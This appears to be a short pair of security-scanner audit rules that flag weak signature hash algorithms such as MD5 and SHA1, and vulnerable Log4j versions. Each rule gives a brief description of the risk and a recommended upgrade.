Audit required: Insecure hash function SC-A1001
D2, MD4, MD5, SHA1 signature algorithms are known to be vulnerable to [collision attacks[(https://en.wikipedia.org/wiki/Collision_attack). Attackers can exploit this to generate another certificate with the same digital signature, allowing them to masquerade as the affected service.
Audit: log4j version used could lead to remote code execution SC-A1003
The log4j library is a popular logging library used across the JVM ecosystem. However, if you are using a vulnerable version of Log4j (A version between 2.0 and 2.16.0), RCE (Remote Code Execution) as well as DoS (Denial of Service) attacks are possible through abuse of Log4j's template processing algorithm.
An attacker can perform a malicious JNDI object lookup to chain other exploits, or induce the application to process a malicious template string resulting in a DoS attack if your code logs request data (such as a user agent header).
Update your Log4j version to 2.17.0 to mitigate these vulnerabilities.